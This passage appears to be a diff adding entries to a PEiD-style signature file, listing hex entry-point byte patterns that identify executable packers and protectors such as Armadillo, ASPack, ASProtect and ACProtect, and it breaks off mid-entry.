+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC
+ep_only = true
+
+[Armadillo v2.60]
+signature = 55 8B EC 6A FF 68 D0 ?? ?? ?? 68 34 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 68 ?? ?? ?? 33 D2 8A D4 89 15 84
+ep_only = true
+
+[Armadillo v2.60b1]
+signature = 55 8B EC 6A FF 68 50 ?? ?? ?? 68 74 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 FC
+ep_only = true
+
+[Armadillo v2.60b2]
+signature = 55 8B EC 6A FF 68 90 ?? ?? ?? 68 24 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 60 ?? ?? ?? 33 D2 8A D4 89 15 3C
+ep_only = true
+
+[Armadillo v2.60a]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 94 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 B4
+ep_only = true
+
+[Armadillo v2.60c]
+signature = 55 8B EC 6A FF 68 40 ?? ?? ?? 68 F4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 F4
+ep_only = true
+
+[Armadillo v2.61]
+signature = 55 8B EC 6A FF 68 28 ?? ?? ?? 68 E4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 0C
+ep_only = true
+
+[Armadillo v2.65b1]
+signature = 55 8B EC 6A FF 68 38 ?? ?? ?? 68 40 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 F4
+ep_only = true
+
+[Armadillo v2.75a]
+signature = 55 8B EC 6A FF 68 68 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24
+ep_only = true
+
+[Armadillo v2.85]
+signature = 55 8B EC 6A FF 68 68 ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24
+ep_only = true
+
+[Armadillo v3.00]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 33 C9
+ep_only = true
+
+[Armadillo v3.00a]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB
+ep_only = true
+
+[Armadillo 3.00a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD 26 42
+ep_only = true
+
+[Armadillo v3.01, v3.05]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 33 C9 75 02 EB 15 EB 33 C9 75 18 7A 0C 70 0E EB 0D E8 72 0E 79 F1 FF 15 00 79 09 74 F0 EB 87 DB 7A F0 A0 33 61 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 A0 8B 04 24 EB 03 7A 29 E9 C6 00 90 C3 E8 70 F0 87 D2 71 07 E9 00 40 8B DB 7A 11 EB 08 E9 EB F7 EB C3 E8 7A E9 70 DA 7B D1 71 F3 E9 7B
+ep_only = true
+
+[Armadillo v3.01 - v3.50a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD B8 43
+ep_only = true
+
+[Armadillo v3.10]
+signature = 55 8B EC 6A FF 68 E0 97 44 00 68 20 C0 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 4C 41 44 00 33 D2 8A D4 89 15 90 A1 44 00 8B C8 81 E1 FF 00 00 00 89 0D 8C A1 44 00 C1 E1 08 03 CA 89 0D 88 A1 44 00 C1 E8 10 A3 84 A1 44 00 33 F6 56 E8 72 16 00 00 59 85 C0 75 08 6A 1C E8 B0 00 00 00 59 89 75 FC E8 3D 13 00 00 FF 15 30 40 44 00 A3 84 B7 44 00 E8 FB 11 00 00 A3 E0 A1 44 00 E8 A4 0F 00 00 E8 E6 0E 00 00 E8 4E F6 FF FF 89 75 D0 8D 45 A4 50 FF 15 38 40 44 00 E8 77 0E 00 00 89 45 9C F6 45 D0 01 74 06 0F B7 45 D4 EB 03 6A 0A 58 50 FF 75 9C 56 56 FF 15 7C 41 44 00 50 E8 49 D4 FE FF 89 45 A0 50 E8 3C F6 FF FF 8B 45 EC 8B 08 8B 09 89 4D 98 50 51 E8 B5 0C 00 00 59 59 C3 8B 65 E8 FF 75 98 E8 2E F6 FF FF 83 3D E8 A1 44 00 01 75 05
+ep_only = true
+
+[Armadillo v3.xx]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58
+ep_only = true
+
+[Armadillo 3.6x -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD AB 76
+ep_only = true
+
+[Armadillo 3.7x -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 B8 3B 01 00 00 03 C5 33 DB 81 C3 01 01 01 01 31 18 81 38 78 54 00 00 74 04 31 18 EB EC
+ep_only = true
+
+[APatch GUI v1.1]
+signature = 52 31 C0 E8 FF FF FF FF
+ep_only = true
+
+[ASPack v1.00b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44
+ep_only = true
+
+[ASPack v1.01b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44
+ep_only = true
+
+[ASPack v1.02a]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF
+ep_only = true
+
+[ASPack v1.02b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 C5 2B 85 7D 7C 43 ?? 89 85 89 7C 43 ?? 80 BD 74 7C 43
+ep_only = true
+
+[ASPack v1.02b]
+signature = 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5
+ep_only = true
+
+[ASPack v1.03b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43
+ep_only = true
+
+[ASPack v1.04b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D
+ep_only = true
+
+[ASPack v1.05b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44
+ep_only = true
+
+[ASPack v1.06b]
+signature = 90 75 00 E9
+ep_only = true
+
+[ASPack v1.06b]
+signature = 90 90 75 00 E9
+ep_only = true
+
+[ASPack v1.06b]
+signature = 90 90 90 75 00 E9
+ep_only = true
+
+[ASPack v1.061b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43
+ep_only = true
+
+[ASPack v1.07b]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE
+ep_only = true
+
+[ASPack v1.07b (DLL)]
+signature = 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5
+ep_only = true
+
+[ASPack v1.07b]
+signature = 90 90 90 75 ?? E9
+ep_only = true
+
+[ASPack v1.07b]
+signature = 90 90 75 ?? E9
+ep_only = true
+
+[ASPack v1.07b]
+signature = 90 75 ?? E9
+ep_only = true
+
+[ASPack v1.08]
+signature = 90 75 01 FF E9
+ep_only = true
+
+[ASPack v1.08]
+signature = 90 90 75 01 FF E9
+ep_only = true
+
+[ASPack v1.08]
+signature = 90 90 90 75 01 FF E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 90 90 90 75 ?? 90 E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 ?? BB 10 ?? 44 ?? 03 DD 2B 9D
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 90 90 75 ?? 90 E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 90 75 ?? 90 E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9
+ep_only = true
+
+[ASPack v1.08.01]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D
+ep_only = true
+
+[ASPack v1.08.02]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72
+ep_only = true
+
+[ASPack v1.08.x]
+signature = 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A
+ep_only = true
+
+[ASPack v1.08.03]
+signature = 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD
+ep_only = true
+
+[ASPack v1.08.03]
+signature = 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD
+ep_only = true
+
+[ASPack v1.08.03]
+signature = 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E
+ep_only = true
+
+[ASPack v1.08.04]
+signature = 60 E8 41 06 00 00 EB 41
+ep_only = true
+
+[ASPack v2.xx]
+signature = A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95
+ep_only = true
+
+[ASPack v2.000]
+signature = 60 E8 70 05 00 00 EB 4C
+ep_only = true
+
+[ASPack v2.001]
+signature = 60 E8 72 05 00 00 EB 4C
+ep_only = true
+
+[ASPack v2.1]
+signature = 60 E8 72 05 00 00 EB 33 87 DB 90 00
+ep_only = true
+
+[ASPack v2.11]
+signature = 60 E9 3D 04 00 00
+ep_only = true
+
+[ASPack v2.11b]
+signature = 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00
+ep_only = true
+
+[ASPack v2.11c]
+signature = 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00
+ep_only = true
+
+[ASPack v2.11d]
+signature = 60 E8 02 00 00 00 EB 09 5D 55
+ep_only = true
+
+[ASPack v2.12]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB
+ep_only = true
+
+[ASPack v2.12]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01
+ep_only = true
+
+[ASPack v2.xx]
+signature = A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95
+ep_only = true
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 04 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 78 03 79 01 ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00
+ep_only = true
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 04 24 06 C3 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66
+ep_only = true
+
+[Anticrack Software Protector v1.09 (ACProtect)]
+signature = 60 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[ASProtect vx.x]
+signature = 90 60 ?? ?? ?? 00 00
+ep_only = true
+
+[ASProtect vx.x]
+signature = 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD
+ep_only = true
+
+[ASProtect v1.0]
+signature = 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D
+ep_only = true
+
+[ASProtect v1.1]
+signature = 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE
+ep_only = true
+
+[ASProtect v1.1 MTE]
+signature = 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9
+ep_only = true
+
+[ASProtect v1.1 MTEb]
+signature = 90 60 E9 ?? 04
+ep_only = true
+
+[ASProtect v1.1 MTEc]
+signature = 90 60 E8 1B ?? ?? ?? E9 FC
+ep_only = true
+
+[ASProtect v1.1 BRS]
+signature = 60 E9 ?? 05
+ep_only = true
+
+[ASProtect v1.2]
+signature = 68 01 ?? ?? ?? C3
+ep_only = true
+
+[ASProtect v1.2x]
+signature = 00 00 68 01 ?? ?? ?? C3 AA
+ep_only = true
+
+[ASProtect v1.2x (New Strain)]
+signature = 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3
+ep_only = true
+
+[ASProtect v1.23 RC1]
+signature = 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3
+ep_only = true
+
+[ASPR Stripper v2.x unpacked]
+signature = BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 9C FC BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AA 9D 61 C3 55 8B EC
+ep_only = true
+
+[Blade Joiner v1.5]
+signature = 55 8B EC 81 C4 E4 FE FF FF 53 56 57 33 C0 89 45 F0 89 85
+ep_only = true
+
+[BopCrypt v1.0]
+signature = 60 BD ?? ?? ?? ?? E8 ?? ?? 00 00
+ep_only = true
+
+[CExe v1.0a]
+signature = 55 8B EC 81 EC 0C 02 ?? ?? 56 BE 04 01 ?? ?? 8D 85 F8 FE FF FF 56 50 6A ?? FF 15 54 10 40 ?? 8A 8D F8 FE FF FF 33 D2 84 C9 8D 85 F8 FE FF FF 74 16
+ep_only = true
+
+[CD-Cops II]
+signature = 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D
+ep_only = true
+
+[CodeCrypt v0.14b]
+signature = E9 C5 02 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[CodeCrypt v0.15b]
+signature = E9 31 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[CodeCrypt v0.16b - v0.163b]
+signature = E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[CodeCrypt v0.164]
+signature = E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F EB 03 FF 1D 34
+ep_only = true
+
+[Code-Lock vx.x]
+signature = 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00
+ep_only = true
+
+[CodeSafe v2.0]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 EC 10 53 56 57 E8 C4 01 00
+ep_only = true
+
+[CopyControl v3.03]
